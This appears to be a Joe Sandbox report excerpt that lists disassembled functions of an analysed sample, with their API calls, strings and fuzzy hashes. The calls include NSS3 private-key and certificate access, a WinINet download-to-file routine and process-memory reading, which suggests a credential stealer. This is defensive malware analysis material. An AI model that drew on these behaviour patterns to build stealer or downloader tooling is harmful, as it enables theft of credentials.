Part of subcall function 6C440BE0: malloc.MOZGLUE(6C438D2D,?,00000000,?), ref: 6C440BF8
Part of subcall function 6C440BE0: TlsGetValue.KERNEL32(6C438D2D,?,00000000,?), ref: 6C440C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C407F4A,00000000,?,00000000,00000000), ref: 6C41DD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C407F4A,00000000,?,00000000,00000000), ref: 6C41DE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C407F4A,00000000,?,00000000,00000000), ref: 6C41DE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C407F4A,00000000,?,00000000,00000000), ref: 6C41DE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C407F4A,00000000,?,00000000,00000000), ref: 6C41DF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C407F4A,00000000,?,00000000,00000000), ref: 6C41DF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C407F4A,00000000,?,00000000,00000000), ref: 6C41DF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C407F4A,00000000,?,00000000,00000000), ref: 6C41DFAA

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 4ca3992336d73daffa371f22b8fe1931ecd194a97d1aa447f019e8f242aca112
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: 8D8190F560EB008BFB16CE59C890F797A92DB6034BF24853AD999CAFE1D774C484C642

Function 6C3F3C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C3F3C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6C3F3C94

Part of subcall function 6C3E95B0: TlsGetValue.KERNEL32(00000000,?,6C4000D2,00000000), ref: 6C3E95D2
Part of subcall function 6C3E95B0: EnterCriticalSection.KERNEL32(?,?,?,6C4000D2,00000000), ref: 6C3E95E7
Part of subcall function 6C3E95B0: PR_Unlock.NSS3(?,?,?,?,6C4000D2,00000000), ref: 6C3E9605

PORT_NewArena_Util.NSS3(00000800), ref: 6C3F3CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C3F3CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C3F3CE1

Part of subcall function 6C3F3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C40AE42), ref: 6C3F30AA
Part of subcall function 6C3F3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C3F30C7
Part of subcall function 6C3F3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C3F30E5
Part of subcall function 6C3F3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C3F3116
Part of subcall function 6C3F3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C3F312B
Part of subcall function 6C3F3090: PK11_DestroyObject.NSS3(?,?), ref: 6C3F3154
Part of subcall function 6C3F3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3F317E

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: c59a19ded0cfebcd80e58f9abf7e9816e519bb04cc3be00b2d0d4a43ca77b463
Instruction ID: 10dab1fba6801ff8a510040fd76d64964aff121a87e876feeec22b14420fa4b4
Opcode Fuzzy Hash: c59a19ded0cfebcd80e58f9abf7e9816e519bb04cc3be00b2d0d4a43ca77b463
Instruction Fuzzy Hash: E861E872A00200ABEF509E65DC41FAB76B9EF14748F084428FE159BA56F732D815CBF2

Function 6C433D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6C433440: PK11_GetAllTokens.NSS3 ref: 6C433481
Part of subcall function 6C433440: PR_SetError.NSS3(00000000,00000000), ref: 6C4334A3
Part of subcall function 6C433440: TlsGetValue.KERNEL32 ref: 6C43352E
Part of subcall function 6C433440: EnterCriticalSection.KERNEL32(?), ref: 6C433542
Part of subcall function 6C433440: PR_Unlock.NSS3(?), ref: 6C43355B

TlsGetValue.KERNEL32 ref: 6C433D8B
EnterCriticalSection.KERNEL32(?), ref: 6C433D9F
PR_Unlock.NSS3(?), ref: 6C433DCA
PR_SetError.NSS3(00000000,00000000), ref: 6C433DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C433E4F

Part of subcall function 6C48C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C48C2BF

TlsGetValue.KERNEL32 ref: 6C433E97
EnterCriticalSection.KERNEL32(?), ref: 6C433EAB
PR_Unlock.NSS3(?), ref: 6C433ED6
PR_SetError.NSS3(00000000,00000000), ref: 6C433EEE

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: 513c1d90619885a50d31af66b916698e76e7bd11b97837406bb82e1690929fcd
Instruction ID: 6924398ee202b95d4a948448566fbf29a8a3d4bc38a20cf98dcdea8371d1cd0c
Opcode Fuzzy Hash: 513c1d90619885a50d31af66b916698e76e7bd11b97837406bb82e1690929fcd
Instruction Fuzzy Hash: 79514971A012208BEB11EF2ADC45F6673B0EF89319F055128DE0D4BB51EB31E856CBC1

Function 6C3E2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(50AC3F2E), ref: 6C3E2C5D

Part of subcall function 6C440D30: calloc.MOZGLUE ref: 6C440D50
Part of subcall function 6C440D30: TlsGetValue.KERNEL32 ref: 6C440D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C3E2C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C3E2CE0

Part of subcall function 6C3E2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C3E2CDA,?,00000000), ref: 6C3E2E1E
Part of subcall function 6C3E2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C3E2E33
Part of subcall function 6C3E2E00: TlsGetValue.KERNEL32 ref: 6C3E2E4E
Part of subcall function 6C3E2E00: EnterCriticalSection.KERNEL32(?), ref: 6C3E2E5E
Part of subcall function 6C3E2E00: PL_HashTableLookup.NSS3(?), ref: 6C3E2E71
Part of subcall function 6C3E2E00: PL_HashTableRemove.NSS3(?), ref: 6C3E2E84
Part of subcall function 6C3E2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C3E2E96
Part of subcall function 6C3E2E00: PR_Unlock.NSS3 ref: 6C3E2EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3E2D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C3E2D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C3E2D3F
free.MOZGLUE(00000000), ref: 6C3E2D73
CERT_DestroyCertificate.NSS3(?), ref: 6C3E2DB8
free.MOZGLUE ref: 6C3E2DC8

Part of subcall function 6C3E3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3E3EC2
Part of subcall function 6C3E3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C3E3ED6
Part of subcall function 6C3E3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C3E3EEE
Part of subcall function 6C3E3E60: PR_CallOnce.NSS3(6C542AA4,6C4412D0), ref: 6C3E3F02
Part of subcall function 6C3E3E60: PL_FreeArenaPool.NSS3 ref: 6C3E3F14
Part of subcall function 6C3E3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C3E3F27

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 4de4d010cb50825cb9f372267c5e02a60ed19388689711efc2689ba383fb2ef9
Instruction ID: e78e0b9746ed13c70025b3aa6115928aeea76a0c5e54e4ce489793866058fa1d
Opcode Fuzzy Hash: 4de4d010cb50825cb9f372267c5e02a60ed19388689711efc2689ba383fb2ef9
Instruction Fuzzy Hash: 4651EF71A043269BEB10DE29CD84B5B77E5EF88208F15052EEDA983750E733E8148F92

Function 6C3E7CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3E40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C3E3F7F,?,00000055,?,?,6C3E1666,?,?), ref: 6C3E40D9
Part of subcall function 6C3E40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C3E1666,?,?), ref: 6C3E40FC
Part of subcall function 6C3E40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C3E1666,?,?), ref: 6C3E4138

PR_GetCurrentThread.NSS3 ref: 6C3E7CFD

Part of subcall function 6C4A9BF0: TlsGetValue.KERNEL32(?,?,?,6C4F0A75), ref: 6C4A9C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6C509030), ref: 6C3E7D1B

Part of subcall function 6C43FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C3E1A3E,00000048,00000054), ref: 6C43FD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6C509048), ref: 6C3E7D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C3E7D50
PR_GetCurrentThread.NSS3 ref: 6C3E7D61
PORT_ArenaMark_Util.NSS3(?), ref: 6C3E7D7D
free.MOZGLUE(?), ref: 6C3E7D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C3E7DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C3E7E19

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: 04956803678bdfcafab78534a894bb95a7865269374a52d21d17573aabd94fc6
Instruction ID: aa8b3c3a7ecf177a05fbd9ed64b20693c8af1a857c6b4a8694c8bb24219bc2b9
Opcode Fuzzy Hash: 04956803678bdfcafab78534a894bb95a7865269374a52d21d17573aabd94fc6
Instruction Fuzzy Hash: 21410972A0012A9BEB00CE699C41FAF37E8AF5925CF050126EC09A7752E731ED15CBE1

Function 00616719 Relevance: 13.6, APIs: 9, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A10
Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A16
Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A1C
Part of subcall function 006149DE: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00614A2E
Part of subcall function 006149DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00614A36

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00616762
StrCmpCA.SHLWAPI(?), ref: 00616782
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 006167A3
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006167BE
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 006167F4
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00616824
CloseHandle.KERNEL32(?), ref: 0061684F
InternetCloseHandle.WININET(00000000), ref: 00616856
InternetCloseHandle.WININET(?), ref: 00616862

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: e94e3d0397bb2b6e8a8985fa2afb44a17466ef57f7c25eb922742e06530b3a96
Instruction ID: 0c9082f8ff2605a923053fd757b018a5b280b6b4a1319f42cd0eec457c7acd01
Opcode Fuzzy Hash: e94e3d0397bb2b6e8a8985fa2afb44a17466ef57f7c25eb922742e06530b3a96
Instruction Fuzzy Hash: 46416FB5900128ABDF709F20DC49BDA7BB9FF05311F1444A5BB09A2151DB349ED5CFA8

Function 6C387D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C387E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C387E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C387EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C387F2E

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C387ED8, 6C387F08, 6C387F19
database corruption, xrefs: 6C387EE2, 6C387F23
%s at line %d of [%.10s], xrefs: 6C387EE7, 6C387F28

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 0a34ad86404a3d761c518eb4e211f22fa4b3487ab8b4f94bfebac1bb7665b840
Instruction ID: f41403851c6c22f6bb5a59e33414c330b45cece0545e6fef6081fba1fda341a2
Opcode Fuzzy Hash: 0a34ad86404a3d761c518eb4e211f22fa4b3487ab8b4f94bfebac1bb7665b840
Instruction Fuzzy Hash: F061AB70B052059FDB05CF29C890BAA37A2AF86308F1449A8EC095BB52D731EC55CFA1

Function 6C36FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C36FD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C36FD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C36FE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C36FE83

Part of subcall function 6C36FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C36FEFA
Part of subcall function 6C36FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C36FF3B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C36FD64, 6C36FE26
database corruption, xrefs: 6C36FD6E, 6C36FE30
%s at line %d of [%.10s], xrefs: 6C36FD73, 6C36FE35

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: 7d31ec5e9b26f3cd310e770196ef9b746715195b75282110b2f24e88ed904040
Instruction ID: dba0332edad850762f1a55c677fa50798a1b441675fb1aa7e49de33e939b1d5f
Opcode Fuzzy Hash: 7d31ec5e9b26f3cd310e770196ef9b746715195b75282110b2f24e88ed904040
Instruction Fuzzy Hash: 53517471A002059FDB04CFAAD890BAA7BB5BF4C308F144069D905ABB5AE735EC54CFA1

Function 00621673 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,00621933,?,00000000,00000000,?,?), ref: 00621692
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,00621933,?,00000000,00000000), ref: 006216BC
ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 00621709
ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00621762
VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 006217BA
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00621933,?,00000000,00000000,?,?), ref: 006217CB

Strings

@, xrefs: 006216D5

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtual
String ID: @
API String ID: 3835927879-2766056989
Opcode ID: af4239019104e75b593a0d18a6c77148cbd227f03a38253cf9ac6bcfd14220ee
Instruction ID: c43648c63779acd15bcf54d2036c8e443cc36ecfdbd96e155293c95883241adc
Opcode Fuzzy Hash: af4239019104e75b593a0d18a6c77148cbd227f03a38253cf9ac6bcfd14220ee
Instruction Fuzzy Hash: 6541D132A04219EFDF109FA1EC45AEF7B77EB96750F148029FA05AA290D770CA51DF90

Function 6C3F8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C40124D,00000001), ref: 6C3F8D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C40124D,00000001), ref: 6C3F8D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C40124D,00000001), ref: 6C3F8D73
PR_Unlock.NSS3(?,?,?,?,?,6C40124D,00000001), ref: 6C3F8D8C

Part of subcall function 6C48DD70: TlsGetValue.KERNEL32 ref: 6C48DD8C
Part of subcall function 6C48DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C48DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C40124D,00000001), ref: 6C3F8DBA

Strings

KRAM, xrefs: 6C3F8D3E
KRAM, xrefs: 6C3F8CF9

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 2fbb31be699da6fa1b42ecb2e466b637a4003e53b9558ef2ef47b4af7fa57806
Instruction ID: 31978cddb64bb0056fcd72912327193e793865b051b50c045c03d6d9a5ebb374
Opcode Fuzzy Hash: 2fbb31be699da6fa1b42ecb2e466b637a4003e53b9558ef2ef47b4af7fa57806
Instruction Fuzzy Hash: A42162B56046018FDB04EF39C54455AB7F4FF46318F15896AE8A987701D735D842CFA2

Function 00623F47 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00623F51
_memset.LIBCMT ref: 00623F89
OpenProcess.KERNEL32(00000410,00000000,?), ref: 00623F9D
EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00623FBA
GetModuleBaseNameA.PSAPI(00000000,?,?,00000104), ref: 00623FD7
CloseHandle.KERNEL32(00000000), ref: 00623FDE

Strings

<unknown>, xrefs: 00623F6D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
